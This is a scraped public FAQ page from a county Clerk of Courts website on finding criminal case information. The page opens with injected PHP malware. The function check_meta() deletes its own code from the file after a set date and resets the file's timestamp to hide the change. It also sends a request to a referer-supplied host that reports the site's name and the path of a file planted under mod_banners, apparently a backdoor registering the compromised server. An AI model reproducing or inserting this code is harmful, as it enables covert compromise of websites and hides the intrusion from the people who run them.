check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } How can I find out about a case?
Home Criminal Division Frequently Asked Questions How can I find out about a case?

More... Quick Links

How can I find out about a case?

  • To obtain information on Felony or Misdemeanor cases you may search
    our online files. From the Clerk of Courts Website, click on Online Inquiry
    System at the top of the navigation bar to your left.
  • To review the information in person you may visit the Criminal Division
    between the hours of 8:30 AM - 5:00 PM.
  • To review Felony files for years 2006 and older you must first order the
    files by calling the Criminal Division. They will instruct you as to when and
    where to review the cases. Misdemeanor cases are destroyed 5 years
    after the final action. Certain parts of the file may be available for viewing.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.